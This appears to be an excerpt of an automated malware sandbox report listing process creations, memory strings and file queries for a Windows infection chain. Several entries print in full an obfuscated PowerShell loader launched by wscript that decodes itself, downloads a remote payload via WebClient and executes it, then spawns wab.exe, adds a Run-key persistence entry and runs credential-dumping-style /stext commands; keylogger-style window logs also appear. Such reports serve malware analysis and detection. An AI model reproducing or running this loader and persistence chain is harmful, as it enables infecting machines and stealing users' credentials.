                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For( $Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke( $Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood 'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0 0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x. ';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes (Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood ',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes (Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood '.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes (Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten) {Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E ') ;UJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;u
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;u
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;uJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle sewerage oplsningsaftenens skrivebordsteoriers strubelydene187 ascon frilgge tlsynspligternes efterskrifter filterable afgiftsobjekter sytjerne unpurchased bestte ligemand michela enarthroses philotechnical patternise unsaponified31 svampekosten miljforbrydelserne formastelse kongrespaladss ophiostaphyle';if (${host}.currentculture) {$sulphoacetic++;}function ivywood($oversteges){$swelly=$oversteges.length-$sulphoacetic;$undfangelsestidspunkter='substri';$undfangelsestidspunkter+='ng';for( $maladministers=1;$maladministers -lt $swelly;$maladministers+=2){$sewerage+=$oversteges.$undfangelsestidspunkter.invoke( $maladministers, $sulphoacetic);}$sewerage;}function unisexes($dobbelterklringens){ . ($botanikkerne) ($dobbelterklringens);}$fyldepenneblk=ivywood 'am.orz i l ltar/b5 . 0h a(ewfi n,dfomwes, .ntt, ,1b0 .,0 ;o mw,i n,6h4,; xd6s4s;r r vf:k1.2 1r. 0l)d ,g,ehc.kao,/.2.0k1.0 0,1v0 1. sf imrde fao x,/a1f2.1j. 0t ';$kilders=ivywood 'surs e,rt- avgbe n tn ';$ascon=ivywood 'rhdt.t p.sr:m/ / c opn t.e mcesgeac. cso.mc.od o / n eswv/ n eaw /.piutsct ean ep.tlyppkt ';$marijanne=ivywood ' > ';$botanikkerne=ivywood '.ipe x. ';$kandidaternes='efterskrifter';$spindelvvs = ivywood ' e c h.ot %fa phpsd.a,tfa.% \ k ans.i nsooeur,n.e ..p r i, ,&h&e epc.h ot tb ';unisexes (ivywood 'e$tg l,opbfa l :,bbe,dmr env icdmednadue =.(ockm,d /.c $lslp,itn d e,lrv v s ) ');unisexes (ivywood ',$ g.l o,bca l,: sot r ubb e,l ybd e nle 1.8,7 =s$,ads c.o,nt..s pblmi.t ( $ m.acr.isjoa n.n ef)o ');unisexes (ivywood ',[rn e ts.essegr.v i c erp,o.ifnktum.a nsa.g e rm]e:t: speecbu ruiat,yspmr,ottuogcao l ,=m [kn,eate.ss.e c u ruiet ympcrso tsoac odlttoyppuet].:,:btelfsg1s2b ');$ascon=$strubelydene187[0];$utilitarianises= (ivywood '.$,g l o.b afli:cctolrstnimctippbehtravls=.n eywh-so bbjfemc t. as,y,sctpe.m . n e t .rwmehbucml,i,ern t');$utilitarianises+=$bedrevidende[1];unisexes ($utilitarianises);unisexes (ivywood ' $kcro r t,iac i pse t,avls.fhvepa.d,esr s [,$ak ibl dse r s ]k=.$ f y.l,d epp,e n nme bslsk, ');$confrere=ivywood '.$.c otr tsiwcsihp.e,tea lg.cd o wfn,l ooa.d f i l.e.( $naus,c,o nb, $ fpojr,m,ams.t,e.lussep)p ';$formastelse=$bedrevidende[0];unisexes (ivywood 'o$,g,l.o bba lu:dv i r irlli tgedtreln =k(.tfe,s ti-cpaa tehd s$sfrogrtmha s tnewlvseet)f ');while (!$viriliteten) {unisexes (ivywood '.$pgnloo braal,:pbnimdne nptde d =w$ t.rmunen ') ;unisexes $confrere;unisexes (ivywood ',sbtma r,ts- skl e eupd .4m ');unisexes (ivywood ' $agbl.o.b.atl : vsi.rdi l iht,e t.eqnt=a(dt evsttu-.p,a toh, ,$df,otr,m apsgt.e ltsue.)e ') ;uJump to behavior
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager51280
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneer
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerlesz
                Source: wab.exe, 0000000B.00000002.3429074546.00000000050A3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneer3k
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.11.drBinary or memory string: [2024/07/01 09:37:52 Program Manager]
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:0
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:k
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
                Source: wab.exe, 0000000B.00000002.3429074546.00000000050A3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.11.drBinary or memory string: [2024/07/01 09:37:45 Program Manager]
                Source: wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerEM <A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA2933 cpuid 11_2_20EA2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
